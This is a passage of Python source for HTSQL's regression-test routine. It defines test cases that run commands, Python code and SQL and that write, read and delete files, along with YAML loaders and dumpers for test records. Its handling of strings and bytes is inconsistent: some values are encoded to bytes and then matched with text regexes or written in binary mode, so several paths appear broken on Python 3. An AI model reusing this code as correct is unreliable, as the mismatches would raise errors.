        Returns the content of the standard output (a string).
        """
        # Terminate the process if it is still alive.
        if self.process.poll() is None:
            self.process.terminate()
            # Give the process a moment to flush its output and exit.
            time.sleep(1.0)
        # Read the standard output.
        with open("%s/output" % self.temp_path, 'rb') as stream:
            output = stream.read()
        # Decode the raw bytes so callers receive `str`; the test data
        # fields that store the output are string-valued, and comparing
        # `bytes` against stored strings would always differ on Python 3.
        output = output.decode('utf-8', errors='replace')
        # Remove the temporary directory.
        shutil.rmtree(self.temp_path)
        # Remove it from the list of active processes.
        self.active_forks.remove(self)
        return output
class StartCtlTestCase(SkipTestCase):
    """
    Starts a long-running routine.
    """
    name = "start-ctl"
    hint = """execute a long-running routine"""
    help = """
    This test case starts a long-running the HTSQL command-line
    application. Use the `end-ctl` test case to finalize the application
    and check the output.
    """
    class Input(TestData):
        fields = [
                Field('start_ctl', SeqVal(StrVal()),
                      hint="""a list of command-line parameters"""),
                # The hint used to read "standard output", which was a
                # copy-paste error: this field holds the stdin content.
                Field('stdin', StrVal(), '',
                      hint="""the content of the standard input"""),
                Field('sleep', UFloatVal(), 0,
                      hint="""sleep for the specified number of seconds"""),
        ] + SkipTestCase.Input.fields
    def verify(self):
        """
        Starts the application and keeps its handle in the testing state,
        keyed by the command-line parameters, for a later `end-ctl`.
        """
        # Check if the test case is skipped.
        if self.skipped():
            return
        # Check if an application with the same command-line parameters
        # has already been started.
        key = tuple(self.input.start_ctl)
        if key in self.state.forks:
            # Was `self.fork(...)`, which does not exist and would raise
            # `AttributeError`; report the failure properly instead.
            return self.failed("*** the application is already started")
        # Start and save the process.
        fork = Fork.start(self.routine.executable,
                          self.input.start_ctl,
                          self.input.stdin)
        self.state.forks[key] = fork
        # Honor the (previously ignored) `sleep` parameter: give the
        # application time to initialize, e.g. to open a listening port.
        if self.input.sleep:
            time.sleep(self.input.sleep)
class EndCtlTestCase(RunAndCompareTestCase):
    """
    Terminates a long-running routine.
    """
    name = "end-ctl"
    hint = """terminate a long-running routine"""
    help = """
    This test case allows you to terminate a long-running routine started
    with `start-ctl`.
    """
    class Input(TestData):
        fields = [
                Field('end_ctl', SeqVal(StrVal()),
                      hint="""a list of command-line parameters"""),
                Field('ignore', BoolVal(), False,
                      hint="""ignore the exit code and the standard output"""),
        ] + SkipTestCase.Input.fields
    class Output(TestData):
        fields = [
                Field('end_ctl', SeqVal(StrVal()),
                      hint="""a list of command-line parameters"""),
                Field('stdout', StrVal(),
                      hint="""the standard output"""),
        ]
    def differs(self, old_output, new_output):
        """
        Checks if the actual output differs from the expected output,
        honoring the `ignore` flag.
        """
        # Check if the actual output differs from the expected output.
        if old_output is None or new_output is None:
            return True
        if not self.input.ignore:
            if old_output.stdout != new_output.stdout:
                return True
        return False
    def render(self, output):
        """
        Converts the output record to a list of lines.
        """
        # Convert the output record to a list of lines.
        if output is None:
            return None
        return output.stdout.splitlines()
    def execute(self):
        """
        Terminates the process started by a matching `start-ctl` case;
        returns a new output record, or ``None`` on error.
        """
        # Execute the test case.
        # Find the active process with the same command-line arguments.
        key = tuple(self.input.end_ctl)
        if key not in self.state.forks:
            return self.out("*** the application has not been started")
        fork = self.state.forks.pop(key)
        # Terminate the process; get the standard output.
        stdout = fork.end()
        # Create and return the output record.
        new_output = self.make_output(end_ctl=self.input.end_ctl,
                                      stdout=stdout)
        return new_output
class PythonCodeTestCase(RunAndCompareTestCase):
    """
    Executes arbitrary Python code.
    """
    name = "python"
    hint = """execute Python code"""
    help = """
    This test case allows you to execute arbitrary Python code.
    """
    class Input(TestData):
        fields = [
                Field('py', WordVal(),
                      hint="""the code name"""),
                Field('code', StrVal(),
                      hint="""Python code"""),
                Field('stdin', StrVal(), '',
                      hint="""the content of the standard input"""),
                Field('expect', StrVal(), None,
                      hint="""the name of an exception to expect"""),
                Field('ignore', BoolVal(), False,
                      hint="""ignore the standard output"""),
        ] + SkipTestCase.Input.fields
    class Output(TestData):
        fields = [
                Field('py', WordVal(),
                      hint="""the code name"""),
                Field('stdout', StrVal(),
                      hint="""the content of the standard output"""),
        ]
    def differs(self, old_output, new_output):
        """
        Checks if the actual output differs from the expected output,
        honoring the `ignore` flag.
        """
        # Check if the actual output differs from the expected output.
        if old_output is None or new_output is None:
            return True
        if not self.input.ignore:
            if old_output.stdout != new_output.stdout:
                return True
        return False
    def render(self, output):
        """
        Converts the output record to a list of lines.
        """
        # Convert the output record to a list of lines.
        if output is None:
            return None
        return output.stdout.splitlines()
    def execute(self):
        """
        Executes the Python code with captured standard streams; returns
        a new output record, or ``None`` on error.
        """
        # Execute the test case.
        # Prepare new standard streams.
        old_stdin = sys.stdin
        old_stdout = sys.stdout
        old_stderr = sys.stderr
        sys.stdin = io.StringIO(self.input.stdin)
        sys.stdout = io.StringIO()
        sys.stderr = sys.stdout
        # Prepare the code.
        code = self.load()
        # The testing state is exposed to the executed code as `state`.
        context = {'state': self.state}
        # Execute the code.
        exc_info = None
        try:
            exec(code, context)
        except:
            exc_info = sys.exc_info()
        # Make new output record.
        # The first input field names the test: `py` here, `py_include`
        # in the subclass; pass it through under the right keyword.
        key = self.input.fields[0].attribute
        new_output = self.make_output(stdout=sys.stdout.getvalue(),
                                      **{key: getattr(self.input, key)})
        # Restore old standard streams.
        sys.stdin = old_stdin
        sys.stdout = old_stdout
        sys.stderr = old_stderr
        # An exception occured while running the code.
        if exc_info is not None:
            # Display the output and the exception
            self.out_diff(self.output, new_output)
            self.out_exception(exc_info)
            exc_name = exc_info[0].__name__
            # The exception was unexpected: discard the output.
            if self.input.expect is None or self.input.expect != exc_name:
                return self.out("*** an unexpected exception occured")
        else:
            # We didn't get the expected exception: discard the output.
            if self.input.expect is not None:
                return self.out("*** an expected exception did not occur")
        return new_output
    def load(self):
        """
        Returns the script source code.
        """
        # Get the script source code.
        return self.input.code
class PythonCodeIncludeTestCase(PythonCodeTestCase):
    """
    Executes arbitrary Python code loaded from a file.
    """
    name = "python-include"
    hint = """load and execute Python code"""
    help = """
    This test case allows you to execute arbitrary Python code
    loaded from a file.
    """
    class Input(TestData):
        fields = [
                Field('py_include', StrVal(),
                      hint="""the file containing Python code"""),
                Field('stdin', StrVal(), '',
                      hint="""the content of the standard input"""),
                Field('expect', StrVal(), None,
                      hint="""the name of an exception to expect"""),
                Field('ignore', BoolVal(), False,
                      hint="""ignore the standard output"""),
        ] + SkipTestCase.Input.fields
    class Output(TestData):
        fields = [
                Field('py_include', StrVal(),
                      hint="""the file containing Python code"""),
                Field('stdout', StrVal(),
                      hint="""the content of the standard output"""),
        ]
    def load(self):
        """
        Returns the script code read from the given file.
        """
        # The file is read in binary mode; `exec()` accepts the raw
        # source bytes as well as a string.
        stream = open(self.input.py_include, 'rb')
        code = stream.read()
        stream.close()
        return code
class SQLTestCase(SkipTestCase):
    """
    Executes a SQL query.
    """
    name = "sql"
    hint = """execute a SQL statement"""
    help = """
    This test case executes one or multiple SQL statements.
    """
    class Input(TestData):
        # Input record: connection URI, the SQL text and error-handling flags.
        fields = [
            Field('connect', DBVal(),
                  hint="""the connection URI"""),
            Field('sql', StrVal(),
                  hint="""the statements to execute"""),
            Field('autocommit', BoolVal(), False,
                  hint="""use the auto-commit mode"""),
            Field('ignore', BoolVal(), False,
                  hint="""ignore any errors"""),
        ] + SkipTestCase.Input.fields
    def out_header(self):
        """Display the header of the test case."""
        # Print:
        #   ---------------- ... -
        #   {first line of input.sql}
        #   ({input.location})
        self.out_sep()
        first_line = self.input.sql.split('\n', 1)[0]
        self.out(first_line, indent=2)
        if self.input.location is not None:
            self.out("(%s)" % self.input.location, indent=2)
    def verify(self):
        """Execute the SQL statements; report success or failure."""
        # Check if the test is skipped.
        if self.skipped():
            return
        # Display the header.
        self.out_header()
        # Load the SQL input data.
        sql = self.load()
        # Generate an HTSQL application.  We need an application instance
        # to split the SQL data and to connect to the database, but we
        # never use it for executing HTSQL queries.
        from htsql import HTSQL
        from htsql.core.error import Error
        from htsql.core.connect import connect
        from htsql.core.split_sql import split_sql
        try:
            app = HTSQL(self.input.connect)
        except Exception as exc:
            self.out_exception(sys.exc_info())
            return self.failed("*** an exception occured while"
                               " initializing an HTSQL application")
        # Activate the application so that we could use the splitter
        # and the connection adapters.
        with app:
            # Realize a splitter and split the input data to individual
            # SQL statements.
            try:
                statements = list(split_sql(sql))
            except ValueError as exc:
                return self.failed("*** invalid SQL: %s" % exc)
            # Realize the connector and connect to the database.
            try:
                connection = connect(with_autocommit=self.input.autocommit)
                cursor = connection.cursor()
            except Error as exc:
                return self.failed("*** failed to connect to the database:"
                                   "\n%s" % exc)
            # Execute the given SQL statements.
            for statement in statements:
                try:
                    # Execute the statement in the current connection.
                    cursor.execute(statement)
                except Error as exc:
                    # Display the statement that caused a problem.
                    for line in statement.splitlines():
                        self.out(line, indent=4)
                    # Normally, we end the test case when an error occurs,
                    # but if `ignore` is set, we just break the loop.
                    if not self.input.ignore:
                        return self.failed("*** failed to execute SQL:"
                                           "\n%s" % exc)
                    break
            # No error occurred while executing the SQL statements.
            # (`for ... else` runs only when the loop was not broken.)
            else:
                # Commit the transaction unless `autocommit` mode is set.
                # Again, respect the `ignore` flag.
                if not self.input.autocommit:
                    try:
                        connection.commit()
                    except Error as exc:
                        if not self.input.ignore:
                            return self.failed("*** failed to commit"
                                               " a transaction:\n%s" % exc)
            # Close the connection.  Note that we insist that connection
            # is opened and closed successfully regardless of the value
            # of the `ignore` flag.
            try:
                connection.close()
            except Error as exc:
                return self.failed("*** failed to close the connection:"
                                   "\n%s" % exc)
        # If we reached that far, we passed the test.
        return self.passed()
    def load(self):
        """
        Returns the SQL data to execute.
        """
        # Override when subclassing.
        return self.input.sql
class SQLIncludeTestCase(SQLTestCase):
    """
    Loads SQL queries from a file and executes them.
    """
    name = "sql-include"
    hint = """load and execute SQL statements"""
    help = """
    This test case loads SQL statements from a file and execute them.
    """
    class Input(TestData):
        # Input record: connection URI, SQL file name and error-handling flags.
        fields = [
            Field('connect', DBVal(),
                  hint="""the connection URI"""),
            Field('sql_include', StrVal(),
                  hint="""the file containing SQL statements"""),
            Field('autocommit', BoolVal(), False,
                  hint="""use the auto-commit mode"""),
            Field('ignore', BoolVal(), False,
                  hint="""ignore any errors"""),
        ] + SkipTestCase.Input.fields
    def out_header(self):
        """Display the header of the test case."""
        # Print:
        #   ---------------- ... -
        #   SQL-INCLUDE {input.sql_include}
        #   ({input.location})
        self.out_sep()
        self.out("%s %s" % (self.name.upper(), self.input.sql_include),
                 indent=2)
        if self.input.location is not None:
            self.out("(%s)" % self.input.location, indent=2)
    def load(self):
        """Return the SQL statements read from the ``sql_include`` file."""
        # Use a context manager so the file is closed even if reading fails
        # (the original left the handle open on error).
        with open(self.input.sql_include, 'rb') as stream:
            return stream.read()
class WriteToFileTestCase(SkipTestCase):
    """
    Writes some data to a file.
    """
    name = "write-to-file"
    hint = """write some data to a file"""
    help = None
    class Input(TestData):
        # Input record: target file name and the payload to write.
        fields = [
            Field('write', StrVal(),
                  hint="""the file name"""),
            Field('data', StrVal(),
                  hint="""the data to write"""),
        ] + SkipTestCase.Input.fields
    def verify(self):
        """Write ``data`` to the ``write`` file; overwrites existing content."""
        # Check if the test is skipped.
        if self.skipped():
            return
        # Display the header.
        self.out_header()
        # Write the data to the file; the context manager guarantees the
        # handle is flushed and closed even if the write fails.
        with open(self.input.write, 'wb') as stream:
            stream.write(self.input.data)
class ReadFromFileTestCase(RunAndCompareTestCase):
    """
    Reads the file content.
    """
    name = "read-from-file"
    hint = """read the content of a file"""
    help = None
    class Input(TestData):
        # Input record: the file to read.
        fields = [
            Field('read', StrVal(),
                  hint="""the file name"""),
        ] + SkipTestCase.Input.fields
    class Output(TestData):
        # Output record: the file name and its captured content.
        fields = [
            Field('read', StrVal(),
                  hint="""the file name"""),
            Field('data', StrVal(),
                  hint="""the content of the file"""),
        ]
    def differs(self, old_output, new_output):
        """Return whether the actual output differs from the expected output."""
        # A missing record on either side always counts as a difference.
        if old_output is None or new_output is None:
            return True
        return (old_output.data != new_output.data)
    def render(self, output):
        """Convert an output record to a list of lines (or ``None``)."""
        if output is None:
            return None
        return output.data.splitlines()
    def execute(self):
        """Read the file and produce a new output record."""
        # Check if the file exists.
        if not os.path.exists(self.input.read):
            return self.out("*** file %r does not exist" % self.input.read)
        # Read the data; the context manager closes the handle even if
        # reading fails (the original leaked it on error).
        with open(self.input.read, 'rb') as stream:
            data = stream.read()
        new_output = self.make_output(read=self.input.read, data=data)
        return new_output
class RemoveFilesTestCase(SkipTestCase):
    """
    Removes the specified files.
    """
    name = "remove-files"
    hint = """remove the specified files"""
    help = """
    Remove a list of files. It is not an error if some of the files do not
    exist.
    """
    class Input(TestData):
        fields = [
            Field('remove', SeqVal(StrVal()),
                  hint="""a list of files to remove"""),
        ] + SkipTestCase.Input.fields
    def verify(self):
        """Delete each listed file that currently exists."""
        # A skipped test does nothing at all.
        if self.skipped():
            return
        self.out_header()
        # Missing files are tolerated by design: only unlink what is there.
        for filename in self.input.remove:
            if os.path.exists(filename):
                os.unlink(filename)
class MakeDirTestCase(SkipTestCase):
    """
    Creates a directory.
    """
    name = "make-dir"
    hint = """create a directory"""
    help = """
    Create a directory. If necessary, all intermediate directories are also
    created.
    """
    class Input(TestData):
        fields = [
            Field('mkdir', StrVal(),
                  hint="""the directory name"""),
        ] + SkipTestCase.Input.fields
    def verify(self):
        """Create the target directory tree if it is not present yet."""
        # A skipped test does nothing at all.
        if self.skipped():
            return
        self.out_header()
        target = self.input.mkdir
        # `makedirs` builds any missing intermediate directories as well.
        if not os.path.isdir(target):
            os.makedirs(target)
class RemoveDirTestCase(SkipTestCase):
    """
    Removes a directory.
    """
    name = "remove-dir"
    hint = """remove a directory"""
    help = """
    Removes a directory with all its content. It is not an error if the
    directory does not exist.
    """
    class Input(TestData):
        fields = [
            Field('rmdir', StrVal(),
                  hint="""the directory name"""),
        ] + SkipTestCase.Input.fields
    def verify(self):
        """Recursively delete the target directory if it exists."""
        # A skipped test does nothing at all.
        if self.skipped():
            return
        self.out_header()
        target = self.input.rmdir
        # DANGEROUS: removes the directory together with all its content.
        if os.path.exists(target):
            shutil.rmtree(target)
class TestState(object):
    """
    Mutable state shared by the testing process.

    `app`
        The active HTSQL application.
    `forks`
        Maps command-line parameters to :class:`Fork` instances
        (long-running applications).
    `toggles`
        The set of currently active named toggles.
    `saves`
        Named application configurations.
    `with_all_suites`
        Set when the current suite (or an ancestor) was explicitly
        selected by the user.
    `passed`, `failed`, `updated`
        Running counters of test outcomes.
    `is_exiting`
        Set when the user asked to halt the testing.
    """
    # Counter/flag attributes that are copied verbatim between a parent
    # state and a derived (suite) state.
    _stat_attributes = ('passed', 'failed', 'updated', 'is_exiting')
    def __init__(self, app=None, forks=None, toggles=None, saves=None,
                 with_all_suites=False, passed=0, failed=0, updated=0,
                 is_exiting=False):
        self.app = app
        # Falsy containers are replaced with fresh empty ones.
        self.forks = forks if forks else {}
        self.toggles = toggles if toggles else set()
        self.saves = saves if saves else {}
        self.with_all_suites = with_all_suites
        self.passed = passed
        self.failed = failed
        self.updated = updated
        self.is_exiting = is_exiting
    def push(self, other):
        """
        Copy this state into a derived state.

        `other` (:class:`TestState`)
            The state a suite creates for its own test cases.
        """
        other.app = self.app
        # Containers are shallow-copied so the child cannot mutate ours.
        other.forks = self.forks.copy()
        other.toggles = self.toggles.copy()
        other.saves = self.saves.copy()
        other.with_all_suites = self.with_all_suites
        for attribute in self._stat_attributes:
            setattr(other, attribute, getattr(self, attribute))
    def pull(self, other):
        """
        Absorb results from a derived state.

        Only the statistics counters and the exit flag propagate back;
        configuration changes made by the child stay local to it.

        `other` (:class:`TestState`)
            The state a suite created for its own test cases.
        """
        for attribute in self._stat_attributes:
            setattr(self, attribute, getattr(other, attribute))
# The base classes for the YAML loaders and dumpers.  Prefer the fast
# LibYAML-based variants when PyYAML was built with them; otherwise fall
# back to the slow pure-Python implementations.
BaseYAMLLoader = getattr(yaml, 'CSafeLoader', yaml.SafeLoader)
BaseYAMLDumper = getattr(yaml, 'CSafeDumper', yaml.SafeDumper)
class RegressYAMLLoader(BaseYAMLLoader):
    """
    Loads test data from a YAML file.

    `routine` (:class:`RegressRoutine`)
        The testing engine.
    `with_input` (Boolean)
        Indicates that the YAML file contains input records.
    `with_output` (Boolean)
        Indicates that the YAML file contains output records.
    `stream` (a file or a file-like object)
        The YAML stream.
    """
    # A pattern to match substitution variables in `!environ` nodes.
    environ_pattern = r"""
        \$ \{
        (?P<name> [a-zA-Z_][0-9a-zA-Z_.-]*)
        (?: : (?P<default> [0-9A-Za-z~@#^&*_;:,./?=+-]*) )?
        \}
    """
    environ_regexp = re.compile(environ_pattern, re.X)
    # A pattern for valid values of substitution variables.
    environ_value_pattern = r"""^ [0-9A-Za-z~@#^&*_;:,./?=+-]* $"""
    environ_value_regexp = re.compile(environ_value_pattern, re.X)
    def __init__(self, routine, with_input, with_output, stream):
        """Prepare the loader and the record-class lookup tables."""
        super(RegressYAMLLoader, self).__init__(stream)
        self.routine = routine
        # The list of permitted record classes.
        self.records = []
        # A mapping of record_class -> case_class.
        self.case_by_record = {}
        # A mapping of record_class -> the set of all attributes.
        self.all_keys_by_record = {}
        # A mapping of record_class -> the set of mandatory attributes.
        self.mandatory_keys_by_record = {}
        # Generate a list of permitted record classes.
        self.init_records(with_input, with_output)
    def init_records(self, with_input, with_output):
        """Build the permitted record classes and their key sets."""
        # Gather the record classes from the available test cases.
        for case_class in self.routine.cases:
            if with_input and case_class.Input is not None:
                self.records.append(case_class.Input)
                self.case_by_record[case_class.Input] = case_class
            if with_output and case_class.Output is not None:
                self.records.append(case_class.Output)
                self.case_by_record[case_class.Output] = case_class
        # For each record class, prepare the set of all attributes and
        # the set of mandatory attributes.
        for record_class in self.records:
            all_keys = set()
            for field in record_class.fields:
                # A wildcard field accepts any key, so the full key set
                # cannot be enumerated; `None` marks that situation.
                if field.is_any:
                    all_keys = None
                    break
                all_keys.add(field.attribute.replace('_', '-'))
            self.all_keys_by_record[record_class] = all_keys
            mandatory_keys = set()
            for field in record_class.fields:
                if field.is_any or not field.is_mandatory:
                    continue
                mandatory_keys.add(field.attribute.replace('_', '-'))
            # `None` means the record cannot be auto-detected by its keys.
            if not mandatory_keys:
                mandatory_keys = None
            self.mandatory_keys_by_record[record_class] = mandatory_keys
    def load(self):
        """
        Loads test data from the YAML stream.
        """
        # That ensures the stream contains one document, parses it and
        # returns the corresponding object.
        return self.get_single_data()
    def construct_document(self, node):
        """Reject documents that do not parse into a known test record."""
        # We override this to ensure that any produced document is
        # a test record of expected type.
        data = super(RegressYAMLLoader, self).construct_document(node)
        if type(data) not in self.records:
            raise yaml.constructor.ConstructorError(None, None,
                    "unexpected document type",
                    node.start_mark)
        return data
    def construct_yaml_str(self, node):
        """Construct a `!!str` scalar as a UTF-8 byte string."""
        # Always convert a `!!str` scalar node to a byte string.
        # By default, PyYAML converts an `!!str`` node containing non-ASCII
        # characters to a Unicode string.
        value = self.construct_scalar(node)
        value = value.encode('utf-8')
        return value
    def construct_yaml_map(self, node):
        """Construct a `!!map` node as a test record or a plain dict."""
        # Detect if a node represent test data and convert it to a test record.
        # We assume that the node represents a test record if it contains
        # all mandatory keys of the record class. Otherwise, we assume it
        # is a regular dictionary.
        #
        # It would be much better to perform this detection on the tag
        # resolution phase. However this phase does not give us access
        # to the mapping keys, so we have no choice but do it during the
        # construction phase.
        # Check if we got a mapping node.
        if not isinstance(node, yaml.MappingNode):
            raise yaml.constructor.ConstructorError(None, None,
                    "expected a mapping node, but found %s" % node.id,
                    node.start_mark)
        # Objects corresponding to the key nodes.
        keys = []
        # Objects corresponding to the value nodes.
        values = []
        # The mapping of key object -> value object.
        value_by_key = {}
        # The mapping of key object -> the mark of the key node.
        key_mark_by_key = {}
        # The mapping of key object -> the mark of the value node.
        value_mark_by_key = {}
        # Convert the key and the value nodes.
        for key_node, value_node in node.value:
            key = self.construct_object(key_node, deep=True)
            # Mapping keys must be hashable; report the offending node.
            try:
                hash(key)
            except TypeError as exc:
                raise yaml.constructor.ConstructorError(
                        "while constructing a mapping",
                        node.start_mark,
                        "found unacceptable key (%s)" % exc,
                        key_node.start_mark)
            keys.append(key)
            value = self.construct_object(value_node, deep=True)
            values.append(value)
            value_by_key[key] = value
            key_mark_by_key[key] = key_node.start_mark
            value_mark_by_key[key] = value_node.start_mark
        # Find a record class such that the node contains all
        # the mandatory record fields.
        detected_record_class = None
        key_set = set(keys)
        for record_class in self.records:
            mandatory_keys = self.mandatory_keys_by_record[record_class]
            if mandatory_keys is None:
                continue
            if key_set.issuperset(mandatory_keys):
                detected_record_class = record_class
                break
        # If we can't find a suitable record class, it must be a regular
        # dictionary.
        if detected_record_class is None:
            return dict(list(zip(keys, values)))
        # Check that the node does not contain any keys other than
        # the record fields.
        all_keys = self.all_keys_by_record[detected_record_class]
        if all_keys is not None:
            for key in keys:
                if key not in all_keys:
                    raise yaml.constructor.ConstructorError(None, None,
                            "unexpected key %r; expected one of %s"
                            % (key, ", ".join(sorted(all_keys))),
                            key_mark_by_key[key])
        # Generate the record attributes: validate and normalize
        # the field values.
        attributes = {}
        for field in detected_record_class.fields:
            if field.is_any:
                continue
            key = field.attribute.replace('_', '-')
            if key in value_by_key:
                value = value_by_key[key]
                try:
                    value = field.val(value)
                except ValueError as exc:
                    raise yaml.constructor.ConstructorError(None, None,
                            "invalid field %r (%s)" % (key, exc),
                            value_mark_by_key[key])
            else:
                value = field.default
            attributes[field.attribute] = value
        # Record where the node was found.
        location = "\"%s\", line %s" \
                % (node.start_mark.name, node.start_mark.line+1)
        # Instantiate and return the test record.
        case_class = self.case_by_record[detected_record_class]
        try:
            record = detected_record_class(self.routine, case_class,
                                           attributes, location)
        except ValueError as exc:
            raise yaml.constructor.ConstructorError(None, None,
                    "invalid test data (%s)" % exc,
                    node.start_mark)
        return record
    def construct_environ(self, node):
        """Construct an `!environ` scalar, expanding ``${NAME:default}``."""
        # Substitute environment variables in `!environ` scalars.
        def replace(match):
            # Substitute environment variables with values.
            name = match.group('name')
            default = match.group('default') or ''
            value = os.environ.get(name, default)
            if not self.environ_value_regexp.match(value):
                raise yaml.constructor.ConstructorError(None, None,
                        "invalid value of environment variable %s: %r"
                        % (name, value), node.start_mark)
            return value
        # Get the scalar value and replace all ${...} occurences with
        # values of respective environment variables.
        value = self.construct_scalar(node)
        value = value.encode('utf-8')
        value = self.environ_regexp.sub(replace, value)
        # Blank values are returned as `None`.
        if not value:
            return None
        return value
# Register custom constructors for `!!str``, `!!map`` and ``!environ``
# so every loaded document goes through the overrides defined above.
RegressYAMLLoader.add_constructor(
        'tag:yaml.org,2002:str',
        RegressYAMLLoader.construct_yaml_str)
RegressYAMLLoader.add_constructor(
        'tag:yaml.org,2002:map',
        RegressYAMLLoader.construct_yaml_map)
RegressYAMLLoader.add_constructor(
        '!environ',
        RegressYAMLLoader.construct_environ)
# Register a resolver for ``!environ``: a plain scalar starting with `$`
# and matching the substitution pattern is implicitly tagged `!environ`.
RegressYAMLLoader.add_implicit_resolver(
        '!environ', RegressYAMLLoader.environ_regexp, ['$'])
class RegressYAMLDumper(BaseYAMLDumper):
    """
    Dumps test data to a YAML file.

    `routine` (:class:`RegressRoutine`)
        The testing engine.
    `with_input` (Boolean)
        Indicates that the YAML file will contain input records.
    `with_output` (Boolean)
        Indicates that the YAML file will contain output records.
    `stream` (a file or a file-like object)
        The stream where the YAML document is written.
    """
    def __init__(self, routine, with_input, with_output, stream, **keywords):
        # FIXME: we don't really need extra `with_*` parameters, this
        # constructor is always called with with_input=False, with_output=True.
        super(RegressYAMLDumper, self).__init__(stream, **keywords)
        self.routine = routine
        # The set of permitted record classes.
        self.records = set()
        # Gather the permitted record classes.
        self.init_records(with_input, with_output)
        # Check if the PyYAML version is suitable for dumping.
        self.check_version()
    def init_records(self, with_input, with_output):
        """Collect the record classes this dumper is allowed to serialize."""
        for case_class in self.routine.cases:
            if with_input and case_class.Input is not None:
                self.records.add(case_class.Input)
            if with_output and case_class.Output is not None:
                self.records.add(case_class.Output)
    @staticmethod
    def _version_key(version):
        """
        Convert a dotted version string to a tuple of integers for
        comparison; a non-numeric suffix in a component is ignored.
        """
        key = []
        for part in version.split('.'):
            digits = ''
            for char in part:
                if not char.isdigit():
                    break
                digits += char
            key.append(int(digits) if digits else 0)
        return tuple(key)
    def check_version(self):
        """Verify that PyYAML/LibYAML are recent enough for stable output."""
        # We require PyYAML >= 3.07 built with LibYAML >= 0.1.2 to dump
        # YAML data. Other versions may produce slightly different output.
        # Since the YAML files may be kept in a VCS repository, we don't
        # want minor formatting changes generate unnecessarily large diffs.
        try:
            pyyaml_version = yaml.__version__
        except AttributeError:
            # Very old PyYAML did not expose `__version__`.
            pyyaml_version = '3.05'
        try:
            import _yaml
            libyaml_version = _yaml.get_version_string()
        except ImportError:
            libyaml_version = None
        # BUG FIX: versions were compared as plain strings, which misorders
        # e.g. '0.1.10' < '0.1.2'; compare numeric tuples instead.
        if self._version_key(pyyaml_version) < self._version_key('3.07'):
            raise ScriptError("PyYAML >= 3.07 is required"
                              " to dump test output")
        if libyaml_version is None:
            raise ScriptError("PyYAML built with LibYAML bindings"
                              " is required to dump test output")
        if self._version_key(libyaml_version) < self._version_key('0.1.2'):
            raise ScriptError("LibYAML >= 0.1.2 is required"
                              " to dump test output")
    def dump(self, data):
        """
        Dumps the data to the YAML stream.
        """
        self.open()
        self.represent(data)
        self.close()
    def represent_str(self, data):
        """Serialize a string, using literal block style for multi-line text."""
        # Serialize a string. We override the default string serializer
        # to use the literal block style for multi-line strings.
        tag = None
        style = None
        if data.endswith('\n'):
            style = '|'
        tag = 'tag:yaml.org,2002:str'
        return self.represent_scalar(tag, data, style=style)
    def represent_record(self, data):
        """Serialize a test record as a YAML mapping, omitting defaults."""
        # Complain when given a record of unexpected type.
        if type(data) not in self.records:
            return super(RegressYAMLDumper, self).represent_undefined(data)
        # Extract the fields skipping those with the default value.
        mapping = []
        for field in data.fields:
            if field.is_any:
                continue
            name = field.attribute.replace('_', '-')
            value = getattr(data, field.attribute)
            if value == field.default:
                continue
            mapping.append((name, value))
        # Generate a mapping node.
        return self.represent_mapping('tag:yaml.org,2002:map', mapping,
                                      flow_style=False)
# Register custom representers for `str` and `TestData`: plain strings go
# through the literal-block-aware serializer, and any `TestData` subclass
# (hence `add_multi_representer`) is emitted as a mapping of its fields.
RegressYAMLDumper.add_representer(
        str, RegressYAMLDumper.represent_str)
RegressYAMLDumper.add_multi_representer(
        TestData, RegressYAMLDumper.represent_record)
class RegressRoutine(Routine):
    """
    Implements the `regress` routine.
    """
    name = 'regress'
    aliases = ['test']
    arguments = [
        Argument('suites', SeqVal(StrVal()), None, is_list=True),
    ]
    options = [
        InputOption,
        TrainOption,
        PurgeOption,
        ForceOption,
        QuietOption,
    ]
    hint = """run regression tests"""
    help = """
    This routine runs a series of test cases.
    A test case takes input data and produces output data. The test
    succeeds if it runs without errors and its output data coincides with
    the expected output.
    Input and output test data are stored in the YAML format. Run
    '%(executable)s help regress <case>' to get the description of the
    format for a specific test type.
    Test cases are organized into suites. A test suite is a special type of
    a test case that contains other test cases.
    By default, the routine executes all tests in the given YAML file. To
    run only specific test suites, list their identifiers in the command
    line.
    Unless option `--force` is used, the testing process will halt on the
    first test failure.
    The routine reads the input data from the standard input stream. Use
    option `--input FILE` to read the input data from a file instead.
    The routine supports training mode, in which it allows you to add
    expected output for new tests and updated expected output for existing
    tests. Use option `--train` to run the routine in the training mode.
    When a test case is removed, the routine does not remove obsolete
    expected output records automatically. Use option `--purge` to remove
    stale output records.
    By default, the routine prints the header of every executed tests. Use
    option `--quiet` to print only errors and final statistics.
    """
    # This text is written to YAML files generated by the routine.
    output_help = """
    #
    # This file contains expected test output data for regression tests.
    # It was generated automatically by the `regress` routine.
    #
    """
    # List of supported types of test cases.
    cases = [
        AppTestCase,
        LoadAppTestCase,
        DefineTestCase,
        IncludeTestCase,
        SuiteTestCase,
        QueryTestCase,
        CtlTestCase,
        StartCtlTestCase,
        EndCtlTestCase,
        PythonCodeTestCase,
        PythonCodeIncludeTestCase,
        SQLTestCase,
        SQLIncludeTestCase,
        WriteToFileTestCase,
        ReadFromFileTestCase,
        RemoveFilesTestCase,
        MakeDirTestCase,
        RemoveDirTestCase,
    ]
    # Represents the mutable state of the testing process.
    state_class = TestState
    @classmethod
    def get_help(cls, **substitutes):
        """
        Returns a long description of the routine.
        """
        # Produce routine description of the form:
        #   {help}
        #
        #   Test cases: (run ... for more help)
        #     {case.name} : {case.hint}
        #     ...
        lines = []
        help = super(RegressRoutine, cls).get_help(**substitutes)
        if help is not None:
            lines.append(help)
        if cls.cases:
            if lines:
                lines.append("")
            lines.append("Test cases:"
                         " (run '%(executable)s help regress <case>'"
                         " for more help)" % substitutes)
            for case_class in cls.cases:
                case_name = case_class.name
                case_hint = case_class.get_hint()
                if case_hint is not None:
                    lines.append("  %-24s : %s" % (case_name, case_hint))
                else:
                    lines.append("  %s" % case_name)
        return "\n".join(lines)
    @classmethod
    def get_feature(cls, name):
        """
        Finds the test case by name.
        """
        for case_class in cls.cases:
            if case_class.name == name:
                return case_class
        raise ScriptError("unknown test case %r" % name)
    def run(self):
        """Execute the routine: run (or train) the loaded test cases."""
        # Get the test input data.
        input = self.load_input(self.input)
        # Initialize the testing state.
        state = self.state_class()
        # Create a test case.
        case = input.case_class(self, state, input, None)
        # Check if all test suites specified by the user exist.
        if self.suites:
            available_suites = case.get_suites()
            for suite in self.suites:
                if suite not in available_suites:
                    raise ScriptError("unknown suite %r" % suite)
        # Start the testing in the selected mode.
        if self.train:
            case.train()
        else:
            case.verify()
        # Display the statistics.
        self.ctl.out("="*72)
        if state.passed:
